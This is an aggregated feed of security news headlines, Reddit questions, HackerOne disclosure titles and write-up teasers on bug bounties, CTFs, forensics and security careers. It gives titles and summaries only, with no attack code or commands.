    Before you tell me to just shill for a VPS, run a crawler and some scripts, I would like to offer some insight. I like collecting old web GIFs and pixel art. These are typically from websites which are hardly active, or in some cases no longer online. Places other people would, usually, share on r/opendirectories. Ergo, whenever I pick these out it's already going to be a manual process. I suppose I can just right click + save as, a few hundred times, but I have found Pinterest's "Save Button" to also be convenient. It's an extension that scans the entire page quickly, and you can choose what to save through a convenient menu, and it even builds a gallery for me. I want to reshare these, so I don't consider it a violation of my privacy that they are being exposed under my account name. False account suspensions aren't unheard of, but it's been working for me so far. Except whenever I need to save any image smaller than 100x100 pixels. Pinterest has a restriction requiring all images to be above 100x100 in resolution, so in this case you have to Save As, pad out the background and then upload. Which is again, a level of tedium I would like to avoid. So, would any of you lovely folks happen to know any decent alternatives? submitted by /u/themadprogramer
    The chiptune archive is back!
    Hey all, it's been a long time. I had my chiptune archive brought down because of the domain, and now it's back, under my own domain. The link is https://chiparchive.com/files. If you all want to talk to me on twitter, it's https://twitter.com/thechiptunearc1 submitted by /u/jreina2002

    Critical XSS in chrome extension
    Chrome extensions have a feature to inject content scripts containing JavaScript code in a web page. By using the standard Document Object…
    Bug Bounty Hunting
    You might wonder what this bug bounty hunting is. Is it hunting bugs or what? Well, certainly it's you hunting down bugs, but not the ones we…
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here. (InfoSec Write-ups)
    IDOR leads to 2fa Bypass
    Hello everyone, my name is Arth Bajpai and I’m back with another writeup.
    PORTSWIGGER WEB SECURITY - SQL INJECTION LAB SOLUTIONS
    PortSwigger Web Security is a web… consisting of labs that contain web security vulnerabilities, including the OWASP Top 10 vulnerabilities…
    Jobs in Cybersecurity
    Hello guys, are you excited to learn cybersecurity or ethical hacking? You are curious about how things work and have a thirst for learning…
    My Pentest Log -3-
    Greetings from Constantinople to all,

    SSRF & Blind XSS in Gravatar email
    Automattic disclosed a bug submitted by rockybandana: https://hackerone.com/reports/1100096 - Bounty: $750
    Clickjacking
    Palo Alto Software disclosed a bug submitted by paramdham: https://hackerone.com/reports/688546

    Registry Analysis - The "Why"
    Why is Registry analysis important? The Windows Registry, in part, controls a good bit of the functionality of a Windows system. As such, Registry analysis can help you understand why you're seeing something, or why you're not seeing something, as the case may be. For example, Registry "settings" (i.e., keys, values, or combinations) can be/have been used to disable Windows Event Logs, enable or disable auditing (the content that goes into the Windows Event Log), disable access to security tools, enable or disable other functionality on Windows systems, etc. The Registry can be used to enable or disable application prefetching, which produces artifacts very commonly used by forensic analysts and incident responders. Most analysts are aware that, particularly with respect to the file sy…

    Analyzing Binaries with Radare2
    submitted by /u/DLLCoolJ
    Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
    submitted by /u/dmchell
    Domain Persistence – Machine Account
    submitted by /u/netbiosX
    zimawhit3/HellsGateNim: A quick example of the Hells Gate technique in Nim
    submitted by /u/dmchell

    Show HN: InternetDB API – Fast IP Lookups for Port and Vulnerability Information
    Article URL: https://internetdb.shodan.io Comments URL: https://news.ycombinator.com/item?id=29970480
    Same-origin violation vulnerability in Safari 15 could leak a user’s website history and identity
    Article URL: https://portswigger.net/daily-swig/same-origin-violation-vulnerability-in-safari-15-could-leak-a-users-website-history-and-identity Comments URL: https://news.ycombinator.com/item?id=29968460

    Capturing RDP NetNTLMv2 Hashes: Attack details and a Technical How-To Guide - GoSecure
    submitted by /u/obilodeau

    Algorithms for software testing
    submitted by /u/WillyRaezer

    SecWiki News 2022-01-17 Review
    Yasso: a powerful internal-network penetration toolkit, by ourren; SecWiki Weekly (issue 411), by ourren; Analysis report on forms of virtual-currency crime in China (mainland), 2021, by ourren. For more recent articles, visit SecWiki.

    DailyBugle TryHackMe Walkthrough
    Introduction: DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers the Joomla 3.7.0 SQL injection vulnerability and… (Hacking Articles)

    ThinkPHP framework penetration in practice
    With ThinkPHP in debug mode, if the server allows outbound database connections, you can brute-force the MySQL service by sending a large number of requests (blocking MySQL).
    FreeBuf Morning Report | Walmart quietly enters the metaverse; Safari bug allows cross-site user tracking
    Walmart will offer users virtual currency and NFTs.
    Tophant wins “Outstanding Organization Award” at the domestic computer peripherals and Xinchuang products security competition
    Tophant received the “Outstanding Organization Award” at the 2021 “Cybersecurity Crowdtesting Platform” security competition for domestic computer peripherals and Xinchuang (IT innovation) products.
    Countdown to the Winter Olympics: Tophant's “cybersecurity assurance legion” delivers on its mission
    Tophant provides pre-Games cybersecurity assessment services and on-duty defensive monitoring during the Games for dozens of central and state-owned enterprises, safeguarding the core systems and network assets of the Winter Olympics.
    “Cybersecurity Industry Talent Position Competency Requirements” standard officially released
    The body of the standard is divided into six parts, covering its scope, normative references, terms and definitions, main directions and positions, competency elements, and more.
    Well-known software abused: watch out for backdoored hosts
    Attackers use phishing to lure victims into running a trojan attached to an email, then attack by combining it with the legitimate Adobe CEF Helper program.
    What is an SSL stripping attack?
    An SSL stripping attack is a network attack in which the attacker downgrades a web connection from the more secure HTTPS to the less secure HTTP.
    EU runs cyberattack exercise against a “virtual” power company
    Last week the EU ran a simulated cyberattack exercise against a “virtual” Finnish power company.
    TC260 publishes draft national standard “Information security technology: Guidelines for identification of important data” for comment
    The Guidelines define “important data” as data existing in electronic form which, once tampered with, destroyed, leaked, or illegally obtained or used, may endanger national security or the public interest.
    Russia claims to have dismantled notorious ransomware gang REvil
    Russia's Federal Security Service (FSB) announced it has dismantled the REvil ransomware gang, which was behind a series of attacks on large organizations such as Kaseya and JBS USA.
    Cybersecurity trends for 2022: 7 heating up, 2 cooling down
    Nine major security trends for 2022; the scope and sophistication of attacks are expected to become even harder to handle in the new year.
    What clustering algorithms are there, and how are they categorized?
    To understand clustering algorithms and distinguish and compare them, it is best to place the specific algorithms in the context of cluster analysis as a whole.
    The 30 most commonly exploited software vulnerabilities of 2020 and 2021
    For all the talk of 0-days, custom malware and other completely unknown vulnerabilities, these flaws have existed for years and are widely exploited.

    Android Application Malware Analysis
    submitted by /u/Apprehensive_Gap6036

    Dynamic execution with DInvoke
    After several months of development, and with the latest features added to the project, I believe Dinvoke_rs is ready for…

    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations, as a number of techniques utilize them for privilege escalation, lateral movement and domain escalation.…

    How do cryptocurrency exchanges like Coinbase defend against man in the middle attacks (MitM)?
    Referring specifically to applications like Evilginx that create fake log in pages and collect session cookies. A session cookie is what the website gives you after you complete signing in (username + password + 2FA) to remember that you did. The tool collects this cookie and passes it to the hacker if you're foolish enough to use their fake log in page. Do Coinbase, Binance, etc. have any protections in place to defend against this? Inb4 don't be stupid: some people are stupid. They deserve to not be robbed. submitted by /u/iExtrapolate314
    Just completed my Security+. What should I do next?
    Just completed my Security+ and not sure what I should do next. Interested more in Blue team than red team. submitted by /u/Linux98
    Facebook lite app whitehat settings guide
    Hi, I'm trying to follow the Facebook guide to intercept the Facebook Lite android application, which uses a binary protocol instead of http. I'm using burp on linux. The section is called "Enable settings from Facebook Lite on Android" https://www.facebook.com/whitehat/education/testing-guides I'm stuck with the NoPE Proxy extension which intercepts traffic. The enable checkbox can't be checked, even if I launch burp as root. https://i.ibb.co/1TN0jgz/1.png In wireshark I get port unreachable after I set my phone dns to my machine IP as mentioned in the fb guide. https://i.ibb.co/q0vfStt/2.png Help, please! I want to intercept Facebook lite android application traffic! submitted by /u/Spare_Prize1148
    Information Security Analyst questions
    Is Information Security Analyst the same as Cyber Security? Can I work in Information Security and be an Information Security Analyst with a bachelor's IT degree plus certifications? Can I work in the Cyber Security field and be in Cyber Security with a bachelor's in IT plus certifications? Can I get into Information Security Analyst and/or the Cyber Security field without a degree at all? What certifications do you guys recommend? I am thinking of doing CompTIA Security+, but first I need to get training going: https://www.comptia.org/training/by-certification/security What is your salary, years of experience, and state? Anyone living in FL and doing Information Security Analyst work, can you give me insight into the job market situation in FL? Is it bad? How is the pay? What do you do in this field? Is it hard? Is this career good, though? submitted by /u/OlympicAnalEater
    Endpoint security confusion
    I have heard a lot of fuss going around regarding endpoint security. Having a background in IT development, I figured that this is what was meant: https://somepage.com/login.php <--- endpoint. But after a little bit of googling it sounds like it has nothing to do with endpoints. Could somebody explain this to me? Or what to search for? submitted by /u/kusichta
    Do you include CVEs on your resume?
    If you have “accredited” CVEs, how do you list them on your resume? Do you link to the NIST website or to a security advisory with your name in it? Thoughts? submitted by /u/BadCSCareerQuestions

    You're running untrusted code!
    submitted by /u/nfrankel
    Free copy of The ssh Plumber's Handbook
    submitted by /u/markcartertm

    Previse HackTheBox Walkthrough
    Introduction: Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection,… (Hacking Articles)

    Digital forensics: Investigation VS Security
    submitted by /u/Apprehensive_Gap6036

    SecWiki News 2022-01-16 Review
    Security academic conference rankings (2021 edition), by ourren; Graph Embedding in practice: Node2vec principles and code walkthrough, by ourren; A first look at WebAssembly, by ourren; Reading modern cybercrime patterns, by ourren. For more recent articles, visit SecWiki.

    Bug Type: HTML injection in confirmation Email!
    Hey everyone! This is about another low-hanging fruit (I’m still not a pro) in one of the web applications listed by OpenBugbounty.
    Advanced persistent threat (APT)
    When a system is under attack, most people think of it as a one-time transfer. When a hacker finds a way to enter the system, he…
    WTF IS IDOR!?
    One of the most crucial vulnerabilities listed in the OWASP top 10 is Insecure Direct Object Reference (IDOR)…
    Authentication Bypass -TryHackMe
    Writeup (InfoSec Write-ups)
    How I was able to see sensitive information on the website of one of India’s best schools
    Hello Readers,
    Beginner Bug Bounty Guide
    Below is a flow diagram based on my experience of how you should start your bug bounty journey. Irrespective of your technical background…

    Dark Web Scraping by OSINT - Scraping & Tools
    Dark Web Scraping & Tools (Medium)
    Dark Web Scraping by OSINT - Darknet & TOR
    History of the Dark Web (Medium)
    Dark Web Scraping by OSINT - OSINT & Hidden Internet
    What is OSINT? (Medium)

    DIY wood chippers
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    I couldn't think of a title so here is a start a long long of music.. Feeling sublime? Don't be a tool. I have the cure; if you go three doors down you might see some bare naked ladies!
    submitted by /u/Yankeeslv

    FreeBuf Morning Report | China's cybersecurity market to keep growing above 15% over the next three years; Linux malware up 35% in 2021
    The China Cybersecurity Industry Alliance released the "China Cybersecurity Industry Analysis Report (2021)", predicting that the cybersecurity market will keep a growth rate above 15% over the next three years and exceed 80 billion yuan by 2023.

    Lack of URL normalization renders Blocked-Previews feature ineffectual
    Slack disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1102764 - Bounty: $1000

    Cerbersec/Ares: Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique
    submitted by /u/dmchell

    Are there examples where two apps together on a device introduced a vulnerability where neither alone necessarily would?
    I'm looking for examples where the interplay between two apps led to a vulnerability which wouldn't exist if either of these apps were present alone. I can think of contrived ways on paper where something like this could happen, e.g. App A creates what it thinks is a uniquely named file and places it somewhere common. App B uses that same file name + path and does limited/no checking that it's created by App B and not another app, which leads to undesirable effects. (One could argue this is a vulnerability in App B by itself.) But are there actually examples where something like this has happened? Someone's banking app is compromised because they also have the Delta app on their phone, etc. etc. Thanks for satiating my curiosity. submitted by /u/CorbinGDawg69

    How I found “Broken Access Control Through out-of-sync setup” and got $1000
    Hello everyone! Hope you all are doing well. I would like to share my “Broken Access Control Through out-of-sync setup” (Medium)

    BreadMan Module Stomping & API Unhooking Using Native APIs
    submitted by /u/dmchell

    Need your ideas for my Master's year project
    My project is on honeypots. Basically, what I have done so far is deploy the T-Pot honeypot on my machine and start getting attacks on it, and my plan is to create a firewall against those attacks. I am also thinking of doing a comparative analysis of SIEM tools (ELK and Splunk), but I'm not sure whether I should do it or not. So I need you to give me some more ideas on what else can be done and how I should create the firewall. Thanks in advance. submitted by /u/GuireccSS
    Blocking DNS over HTTPS
    Basically, 443 is already a headache since we cannot decrypt traffic for all devices, but I think DNS over HTTPS is one of the important items. Can anything be done besides manually blocking a list of known DNS providers? Adding a note: the purpose is network security; I don't want DNS over HTTP on the network. I know DNS isn't the only thing that can be passed through 443, but this seems like the most important. submitted by /u/shodanless
    Creative ways to knock someone off router using too much bandwidth?
    We have pretty slow internet at our house and it’s split across myself and a few roommates. One roommate in particular is doing… something where the bandwidth my other roommate and I get basically drops to zero for hours on end. We’ve asked them to be more considerate, and they don’t seem interested in sharing what awful internet we have. Obviously we could just log into the router and blacklist his devices, but the router is in his room, so he can just unplug it and then we’re all screwed. What are some more “creative” ways to knock his devices off the network, or otherwise prevent them from hogging all the bandwidth on the network, that don’t involve access to the router? Edit: I appreciate the great advice coming out of AskNetsec about communication and other interpersonal skills; loving the high empathy in this community. That said, let’s keep this to a very narrow threat model with the assumption that: the roommate is unwilling to communicate; installing any new hardware is impossible; access to the router is impossible; buying a second internet connection is impossible. The model therefore should be the target's computer, which must be impacted by the actor's computer directly, through the router possibly, but without changing any settings on it. submitted by /u/JamieOvechkin
    Who do we hire and why?
    Some of the past subjects and replies seem to imply there are a lot of questions on what a qualified cyber security employee is. So let's try to help the boys and girls that want to enter this career and are not sure of what we are looking for. So, for all you hiring managers and anyone that was involved in hiring decisions for cyber security hires in the past 5 years (pre and post COVID), please answer the following questions and let's see if we can give the prospects some ideas on what they need vs what they think they need. 1. Industry, job title/descriptions and ballpark salary. Education – Cyber Security Jr Analyst, assist the cyber security team in daily duties. $35k Automotive – Sr Cyber Security Engineer, SME in Email, cloud EDR/XDR, C level reporting and mentoring. $150k Auto Mot…
    Is 1.1.1.1 a VPN?
    submitted by /u/Environmental_Camp24
    Secure Boot is silently disabled after a BIOS upgrade
    Hi. I'm new to this subreddit, so I'm not sure if my question is appropriate here. Feel free to direct me to another subreddit. After installing the beta version 7B86vAG4 of the BIOS for my MSI B450-A PRO motherboard, Secure Boot silently stopped working. That is, it boots any OS, for example the Arch Linux installation medium. I see this behavior with the factory default Secure Boot keys, which are likely MSI's and Microsoft's keys, and with my own keys. But the keys shouldn't matter, since the Arch Linux installation medium isn't signed by anybody: "The official installation image does not support Secure Boot (FS#53864). To successfully boot the installation medium you will need to disable Secure Boot." (source) I reverted to version 7B86vAD, where Secure Boot works as expected. The last reply from MSI support was: I: "I do not use Windows at all." Support: "Generally speaking, the secure boot won't take effect if your system cannot be supported. Please don't worry about it. Thanks!" Well, I don't think I shouldn't worry about that. Secure Boot should work irrespective of the OS in this case, since the OS isn't even booted. There are many people using Secure Boot with Linux. I would like to know whether this is just my motherboard or whether I set up Secure Boot incorrectly. If it's not just me, I feel obliged to report this bug somewhere. A user won't see it if they set up Secure Boot before upgrading their BIOS. submitted by /u/beroal
    Do you allow Google Docs to your employees on the LAN?
    Hi folks. As we all know, Google Drive/Docs/Sheets, Dropbox or any other cloud storage are major vectors for malware, so we are blocking them in our corporate LAN. Lately, our organization's employee satisfaction department in HR started conducting surveys using Google Docs by sharing a link with all employees, and asked the IT department to ensure it is working on all desktops. Is it safe to allow? I understand there are security risks, but on the other hand there is a business demand that needs to be taken care of. Can someone give a second thought on this please? Would love to have your valuable inputs. submitted by /u/techno_it
    Best automated pen testing software
    Hi folks, I have a vendor that will require me to open an application to the web for credit card processing. I don't believe they're taking security seriously, so I'm currently looking at hiring a vendor to do penetration testing for that app through the firewall. However, if the bids come in too high, and just for ongoing testing in general, I'd like to learn what knowledgeable folks use for automated penetration testing. Please don't say "Kali" unless you can help me with a specific program I can use on that veritable Swiss army knife of hacking tools. :) Thanks in advance! submitted by /u/Leeto2
    HELP! Should I consider myself hacked/go into panic mode over this?
    Three months ago I received a newsletter from AltCoinTrader.co.za in my Gmail inbox. However, I never signed up for this site. I initially brushed it off for peace of mind. But I keep getting scared every time I remember it, so I wanted to finish it by contacting the site's support and asking if my email was ever registered with them. To my horror, they said that someone did register but did not activate the account in May 2020. However, I could not find an activation email in my inbox, which has me worried that someone does have access to it and deleted it before I could see it. It is unlikely to be me, since I wrote an email around the same time and other useless emails from that time period are still there. I have switched PCs since May 2020, but have kept my phone. My Gmail also has a new password + 2FA now. However, the new PC did share the same network briefly with my old PC. I very recently re-opened my old PC and did a thorough malware scan. Unfortunately, it found 3 Trojans. The current PC has had a clean bill of health so far. The problem is I have done very sensitive stuff on that PC, from credit card details, SSN, online banking passwords, and, worst of all, confidential information for my work, including customers' personal data. I still don't know if I should treat this as a confirmed hack and/or full-on panic. Aside from this anomaly and the Trojans, the only other weird thing is my phone keeps logging account activity by itself sometimes (which I assume is it just pinging Google servers). Apart from that, none of my accounts showed any signs of compromise. I also consulted someone earlier who said the Trojans could possibly be unrelated. And it is unclear what the motive is for someone to use someone else's email for crypto trading and log in to the account only to delete the confirmation email. Please help me with this. This is so strange, and a lot is at stake if I was compromised. I might actually get hospitalized over the stress from this. submitted by /u/WrestleMaykr
    Wordlist Generation for Password Cracking
    I have been researching software to use to generate wordlists for password cracking, but haven't been able to find one that generates passwords given parameters (birthday, hobbies, etc.). Does anyone know of any software that can do this, or should I just try to create my own? Thanks in advance. submitted by /u/Odd_Rip6706
    Being aggressively targeted: how can I make a VM that cannot put anything on my host machine?
    Hello everyone, first off I just want to say great community. Second of all, I have a question that needs severe attention. My father and I are being aggressively targeted by malware writers for a reason I don't want to reveal; we didn't do anything bad, we aren't bad people, it's because of what we have. I would rather not spend the money for Sophos Sandstorm, or any of the other costly products out there, when this can all be done open source and with some smart minds. I need to have Windows 10 on my machine for business software, unfortunately, or I'd jump to Linux. Either way, I am still a target. I need to put a VM on my machine (if that's the best way to do this; if not, please say so), or multiple VMs. I need to know which VM to use, and how to make it so that if I do get malware on my VM, which I would be using all the time, it will not be able to pass through and attach itself to my host machine. How exactly is this possible, what settings do I need to set, what Linux distro should I use, and will I be safe using the business software, which is Win10 only, on a VM? I can use the software with my Ethernet unplugged, and I have no WNIC on my PC. Thank you very much for your help, it is appreciated more than you know. submitted by /u/pixeldev
    Issues with GIAC labs?
    I have a buddy who is studying for a GIAC exam who says the labs on the practice tests are trash. Can anyone confirm this? Is this a common issue? submitted by /u/sephstorm
    Deleted Google account
    I am trying to recover data from a deleted Google account. I have local law enforcement requesting all data related to the Google account. Are we going to be able to recover deleted emails and other files? submitted by /u/LS2fast

    Toolbox HackTheBox Walkthrough
    Toolbox is a CTF Windows box with difficulty rated as “easy” on the HackTheBox platform. The machine covers SQL injections, gaining interactive shell, escaping … (from Hacking Articles)
    Multiple Files to Capture NTLM Hashes: NTLM Theft
    Often while conducting penetration tests, attackers aim to escalate their privileges. Be it Kerberoasting or a simple lsass dump attack, stealing NTLM hashes always … (from Hacking Articles)

    IndexedDB in Safari 15 leaks your browsing activity in real time
    submitted by /u/Synchisis
    A Detailed Guide to cracking the OSWE Certification
    submitted by /u/YashitM
    10 real-world stories of how we’ve compromised CI/CD pipelines
    submitted by /u/digicat

    SecWiki News 2022-01-15 Review
    End-to-end models in practice for employee attrition early warning by ourren; A first look at common attack techniques of internet-sector underground cybercrime by ourren; Zeek - Detect Godzilla WebShell by ourren; The evolution of cloud firewall products by ourren; MSF+: generating trojans that evade traffic-level detection by ourren; Analyzing the OceanLotus group's customized malicious file strategy by ourren; r3kapig skill stack 1.0 by ourren; Building the X通 information security training system by ourren; ATT&CK Techniques to Security Events by ourren. For more recent articles, visit SecWiki

    science books & papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Google Search operators
    Does anyone know of a good website or document explaining these Google commands? http://www.googleguide.com/advanced_operators_reference.html How to put them together, and explaining the difference between inurl and -inurl? Do I put the file types in brackets, like this: (.mkv|.mp4|.avi|.mov|.mpg|.wmv), or does it matter? I.e. intext:"chernobyl" intitle:"index.of" (wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) or +(.mkv|.mp4|.avi|.mov|.mpg|.wmv) chernobyl intitle:"index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) Note: the commands are in a different order. Does order matter? The above link only explains one command at a time, but apparently you can compound these commands to be more specific. Thanks for your input... submitted by /u/klutz50
    Movies (2020, 2021), some Series and Anime
    http://smart-playtv.fr/VOD/ submitted by /u/gimvaainl

    Autopsy with Wireshark
    Can you import pcap files from Wireshark into Autopsy? Is there an extension to do this? submitted by /u/swatteam23
    Cellebrite 4PC PC requirements
    LE that is just about to become my department's first and sole Cellebrite user. We are putting a budget together (Cellebrite's sales people are annoyingly hard to get in contact with) and we've got our prices ballparked, and everything looks good except a computer build. We've talked with 2 other Cellebrite users who both said they had to buy a $4-5k desktop build to work efficiently with Cellebrite. I've built a PC before and have a basic knowledge about them; however, I don't get these $4k+ build costs when all that's really necessary is an average build with an Intel processor and a decent amount of RAM. Besides that, I have put in a good chunk of the budget to cover memory and additional hard drives to handle data/evidence. Are the other Cellebrite users just getting railroaded by vendors selling them overpriced pre-built models, or is there something more to the build/requirements? Any advice would be greatly appreciated. submitted by /u/crimsontidepride
    Secure storage identification
    A follow-up to my previous post: I can confirm that the premium tools are able to obtain the contents of the secure storage. I did find a product that will tell you if secure storage is in use. Wondering if anyone knows how to manually determine whether secure storage is in use, besides relying on the product to tell you? submitted by /u/scrappybytes

    [available] Calculus: Early Transcendentals Ninth Edition
    submitted by /u/joey-sm
    Rob's stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Massive collection of music (mostly not well known artists)
    Update: OK, I did not know the links redirected to Amazon (as I do not download mp3 files usually). What caught my attention was the band names that I did not know about. submitted by /u/SexRevolutionnow
    photos of toronto
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Bolivian buses
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    In-organization stored XSS using location (Larksuite survey app)
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/998138 - Bounty: $500
    Stored XSS on helpdesk using user's city
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/971857 - Bounty: $500
    SQL Injection and plaintext passwords via User Search
    IBM disclosed a bug submitted by xyantix: https://hackerone.com/reports/703819
    Deserialization of potentially malicious data to RCE
    Django disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1415436

    tlsmate: tool to scan TLS servers for their configuration weaknesses and vulnerabilities
    submitted by /u/CantSayThatMuch
    A Deep Dive into The Grief Ransomware’s Capabilities
    submitted by /u/CyberMasterV

    What are the chances that I get a job abroad after graduating?
    Hey there, I'm from Tunisia (North Africa). I graduated a few months ago majoring in cyber security (I have a 3y degree in network administration and a 3y degree in security). I didn't start looking for a job until these past few days due to a personal problem in the family, but now I'm wondering what my chances are to find a job abroad. The usual destination for us is France, but tbh I'm looking for somewhere else: anywhere in Europe, the US or even (uuum especially) Australia. I got 3 CCNA certs and my English is pretty good. The thing is, my experience is limited to school projects and 2 internships where I touched on real-world work. I'm not posting my CV unless requested; I'm not here looking for a job (and I don't want to break any rule), but I'm here to ask. Please keep in mind the COVID situation in the world right now, which I think is reducing the travelling potential. Thanks in advance. submitted by /u/Dalleuh
    What tools do you use to audit AD users?
    What tools do you use to audit users in AD? For example, a list of those who haven't logged in for a very long time, or who haven't changed their password in a long time, or who are without 2FA. To be honest, I did not find such functionality in AD (or if I did, it was inconvenient). submitted by /u/athanielx
    Appsec engineering at Meta/Facebook - how is the work?
    Hi, I'm wondering what the work of application security engineers at Meta/FB is like. Do they write code, or only do code reviews? What are the usual tasks of an engineer in such a role? submitted by /u/sapup
    CEO scam solution?
    The problem is: fake CEO or senior official social media profiles are used to scam ("pay this fee to get this job"). - What solutions could monitor the web/social media to find such fake profiles or websites? - Would these solutions find this, or is it something in social media/web monitoring? Thank you for the answers. submitted by /u/NerdSupremacist
    What's the name of this app that displays your other usernames?
    A few years ago, a friend of mine was travelling in the GCC (Gulf States). His friend showed him an app where he fed in my friend's phone number and all his social IDs popped up: all the different usernames he has been using on other social media platforms, going back several years. The sites that he remembers his IDs from: Grindr, Manjam, Gaydar, Badoo etc. Does anyone know what this thing is called, or what the name of such an app is? submitted by /u/saffrown
    Newbie with a couple of questions about the CEH v11!
    Top of the mornin' to ya, fellow cyber lads and ladies! I'm hoping to take the ANSI v11 exam in the next three months or so, and I have the following questions. Is 3 months enough prep time if I have a B.S. in Cybersecurity? (From what I hear, the ANSI is just a glorified Sec+.) Access to the iLabs, the textbook, Messier's practice tests, Messier's study guide, O'Reilly's videos and Messier's v10 videos on Udemy: will this do for prep material? Question about the CEH Practical here: will the Practical exam be a good first step on a year-long journey to the OSCP? Tenks. submitted by /u/Puddin2yerHarley
    TikTok is hideous... but unfortunately necessary for engaging with my readers. Any advice?
    I generally hate social media. It's toxic, predatory, and spying on the user 95% of the time. Unfortunately it's also a necessary engagement channel for writers. I've banished it from my personal life but unfortunately need to be able to connect with readers and market my stuff. I recently paid for a session with a social media consultant who was aghast that I was not on TikTok. I explained my political concerns with TikTok's links to certain authoritarian governments, as well as the massive data-mining hard-cooked into the code, and the evidence it's detrimental to mental health. She looked at me like I was a caveman wearing a tinfoil hat and went on to show me some metrics. Sadly it became clear that most of the reader demographic I'm trying to market my content to are using TikTok almost exclusively as their drug of choice. Fuck. So here's my question/TLDR: Is there a third-party application or method of "corralling" TikTok's spying functions? Is it possible to post via a desktop browser and bypass the application entirely? Should I look into running it inside an emulator? I'd certainly appreciate any input or suggestions! Who knew cyberpunk dystopia could be so banal. submitted by /u/writtenloudly
    Salary range for Jr Security Analyst in the Bay Area, CA
    Hi all, I was wondering what the salary range would be for a junior security analyst position in the Bay Area, California. Is 100k asking too much? The cost of living is really expensive there, so I’m not so sure. Any help is appreciated! submitted by /u/nkookie
    Need your suggestion for this scenario to withstand port scanning
    We have a hosted website which has multiple subdomains, roughly about 1000. Recently a security research company started running port scans, and this is affecting our website health, with some pages going down and the CPU usage crossing the threshold. Basically, the application is deployed in AKS (k8s) and the backends are behind Azure Front Door, and some subdomains are managed by Global Traffic Manager as well, all on Azure. Unfortunately we cannot stop these scans; however, we have been asked to change our design or solution, as the port scanner hits every subdomain at the same point and all of them point to a single host, and this is causing the issue. Need your advice or suggestions on how we can overcome and withstand the port scans without affecting our site. How to load balance this scenario in a much more efficient way? submitted by /u/SnooGoats8879
    Favourite CSPM?
    CSPMs are a must in enterprise environments these days. Based on my initial research, Prisma Cloud and Orca Security stand out. Are there any specific CSPMs that you'd recommend besides these two? submitted by /u/DryPath
    Taking care of the parents
    I have an odd one and am looking for some advice. My parents are getting on in age and I am looking for a solution to help monitor their phones and give them remote support when they need it. I am going to hook them into my family plan with LastPass to help them with passwords, but is there anything for Android that is the equivalent of LogMeIn? Also, more of a general question, but how do you all care for your parents tech-wise? Not sure if I am overstepping my boundaries, but I've already had one family member fall prey to a scammer. submitted by /u/OakenRage

    Nim variant of MDSec's Parallel Syscalls EDR hook bypass
    submitted by /u/DarkGrejuva
    Exploit Kits vs. Google Chrome - Avast Threat Labs
    submitted by /u/dmchell

    SecWiki News 2022-01-14 Review
    No news updates yet today~ For more recent articles, visit SecWiki

    Bug Alert — Critical Vulnerability Alerting System
    High impact vulnerability notification over email, phone call, or SMS (Medium)
    My Pentest Log -2-
    Greetings from Constantinople to all, (Medium)
    True Life: Recovering Bug Bounty Hacker: Chapter 1 — GoodRx
    I decided to start a series about the experiences I’ve had with bug bounty programs. I wanted to first start off with the written story so… (Medium)

    Honeypot Discussions Part-2
    Honeypot Types (Medium)
    PowerShell Execution Strategy
    What is PowerShell execution strategy (Medium)

    My Pentest Log -2-
    Greetings from Constantinople to all, (Medium)
    Go 1.18 — native Fuzzing and Dinosaurs
    Last month, the Go language team released the Go 1.18 Beta 1. It contains the much awaited generic support, which we’re very excited to… (Medium)

    Ukrainian police arrest ransomware gang that attacked more than 50 companies
    Ukrainian police arrested five cybercriminals; the gang reportedly used ransomware to attack about 50 US and European companies.
    Knowledge Continent Q&A vol.03 | First steps on the new continent
    A collection of popular questions since the official release!
    FreeBuf Street Interviews | To kick off 2022 we talked cybersecurity with 10 passers-by
    FreeBuf staff randomly interviewed passers-by on the street to see how strong their cybersecurity and personal protection awareness really is.
    Java Code Audit — XSS Cross-Site Scripting
    Solving the problem of how to defend against XSS by analyzing how XSS arises.
    FreeBuf Weekly | "Cybersecurity Knowledge Continent" 1.0 officially launched; Facebook launches "Privacy Center"
    Happy weekend, FreeBufers~ Here is this week's FreeBuf Weekly, in which we summarize and recommend the week's hot news, quality articles and handy tools, so nobody misses a single highlight of the week!
    See you in Shanghai on March 2! CIS 2021 Spring edition agenda to be announced soon
    FreeBuf invites the whole cybersecurity community to gather at the Shanghai Marriott Hotel Parkview on March 2-3 for the "CIS 2021 Cybersecurity Innovation Conference Spring edition".
    White House hosts open-source security summit, attended by many tech giants
    On January 13 local time, numerous tech giants and federal agencies gathered at the White House to discuss open-source software security.
    LeagSoft releases: Top 10 endpoint security trends for 2022
    As a leader in enterprise endpoint security in China, LeagSoft draws on 19 years of endpoint security practice and industry experience and has published cutting-edge endpoint security trends for three consecutive years, aiming to offer the industry fresh ideas and references.
    Iranian APT35 hacker group exploits Log4j vulnerability to deploy new PowerShell backdoor
    Research indicates that Iran's APT35 group is exploiting the Log4Shell vulnerability in attacks and implanting a new kind of backdoor.

    Snikket Server – 2022-01-13 security release (CVE-2022-0217)
    Article URL: https://snikket.org/blog/snikket-jan-2021-security-release/ Comments URL: https://news.ycombinator.com/item?id=29931694 Points: 1, Comments: 0

    The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More
    We identify recent trends in web threats, including top malware families. Web skimmers, difficult to detect and easy to deploy, are highlighted. (Unit42)

    Bug Report: [No Valid SPF Records]
    Ruby disclosed a bug submitted by sohaib619: https://hackerone.com/reports/1301696
    AEM forms XXE Vulnerability
    Adobe disclosed a bug submitted by ismailmuh: https://hackerone.com/reports/1321070
    Disclosure of GitHub access token in config file via nginx off-by-slash
